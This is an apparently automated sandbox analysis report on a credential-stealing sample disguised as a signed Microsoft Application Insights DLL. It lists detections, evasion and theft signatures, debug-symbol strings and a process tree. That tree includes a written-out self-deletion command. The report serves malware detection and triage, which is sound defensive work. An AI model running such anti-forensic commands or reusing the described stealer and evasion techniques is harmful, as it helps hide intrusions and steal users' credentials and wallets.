Play interactive tour

Edit tour

Windows Analysis Report Microsoft.ApplicationInsights.PersistenceChannel.dll

Overview

General Information

Sample Name:	Microsoft.ApplicationInsights.PersistenceChannel.dll (renamed file extension from dll to exe)
Analysis ID:	482276
MD5:	14e351015c5d632f888dbcac03871fae
SHA1:	b5471c5eea356ce87ac5c2df8bbd9bc72cf84da9
SHA256:	977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa
Tags:	exeOuterJoinSrlsigned
Infos:
Most interesting Screenshot:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Compliance

Score:	47
Range:	0 - 100

Signatures

Multi AV Scanner detection for submitted file

Tries to steal Crypto Currency Wallets

.NET source code references suspicious native API functions

Self deletion via cmd delete

.NET source code contains very large array initializations

Contains functionality to detect sleep reduction / modifications

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Drops PE files to the application program directory (C:\ProgramData)

One or more processes crash

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Downloads executable code via HTTP

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

PE file contains more sections than normal

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Uses Microsoft's Enhanced Cryptographic Provider

May check if the current machine is a sandbox (GetTickCount - Sleep)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

Microsoft.ApplicationInsights.PersistenceChannel.exe (PID: 7056 cmdline: 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' MD5: 14E351015C5D632F888DBCAC03871FAE)

Microsoft.ApplicationInsights.PersistenceChannel.exe (PID: 6340 cmdline: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe MD5: 14E351015C5D632F888DBCAC03871FAE)

cmd.exe (PID: 2216 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

timeout.exe (PID: 5624 cmdline: timeout /t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)

WerFault.exe (PID: 5568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 1156 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.684293295.0000000000BAB000.00000004.00000020.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	Virustotal: Detection: 40%			Perma Link
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe	ReversingLabs: Detection: 28%

Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.25.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f6a6e0.23.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.11.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.3f8a700.10.unpack	Avira: Label: TR/Patched.Ren.Gen

Cryptography:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_004062D0 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00406230 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00405F50 CryptUnprotectData,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00406560 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00403BE0 memset,CryptStringToBinaryA,CryptStringToBinaryA,

Compliance:

Uses 32bit PE files

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

PE / OLE file has a valid certificate

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: certificate valid

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: KC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.699534963.00000000050EA000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.pdba source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source:	Binary string: moryProtection.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: isualBasic.pdbW source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: ml.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: .ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Windows.Forms.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ility.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbeChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.pdb"" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.Windows.Forms.pdb8 source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbt/ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.Runtime.Remoting.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: w.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wsspicli.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbm source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdbdr source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: f:\Builds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdbCO source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: InC:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbT3}l source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.pdbH source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbf9z source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: System.Configuration.pdbD source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 0000000B.00000003.699953933.00000000031B2000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: Accessibility.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: System.Runtime.Remoting.pdblrP source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.711649726.0000000005671000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: msvcr120_clr0400.i386.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdbpdbnel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb{{ source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: Windows.Storage.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: comctl32v582.pdb: source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Accessibility.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.736476721.0000000003F32000.00000004.00000001.sdmp
Source:	Binary string: rawing.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wrpcrt4.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678556023.000000000127C000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.PDB source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdb\ source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: userenv.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: RunPE_MemoryProtection.pdbFyg source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: ore.pdb, source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: uilds\629\AppInsights\DC_Core_release_signed\obj\Release\TelemetryChannels\PersistenceChannel\Net40\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000002.728618743.0000000001291000.00000004.00000020.sdmp
Source:	Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 0000000B.00000003.699575783.00000000031A6000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: C:\Windows\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdbR source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: \??\C:\Windows\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdboq source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: symbols\exe\Microsoft.ApplicationInsights.PersistenceChannel.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.687120977.0000000000EF8000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Runtime.Remoting.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: RunPE_MemoryProtection.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: ore.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.ApplicationInsights.PersistenceChannel.pdbd source: WERBFBB.tmp.dmp.11.dr
Source:	Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.711751225.0000000005640000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: rawing.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000B.00000003.699980162.00000000031B8000.00000004.00000001.sdmp
Source:	Binary string: Amsi.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.711688780.0000000005644000.00000004.00000040.sdmp
Source:	Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.727307121.0000000005850000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbrt- source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678514620.000000000122F000.00000004.00000020.sdmp
Source:	Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb" source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: untime.Remoting.pdb source: WerFault.exe, 0000000B.00000003.711541128.0000000005654000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp, WERBFBB.tmp.dmp.11.dr
Source:	Binary string: cryptbase.pdbk source: WerFault.exe, 0000000B.00000003.711571886.0000000005641000.00000004.00000040.sdmp
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.711709209.0000000005647000.00000004.00000040.sdmp

Spreading:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00401000 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
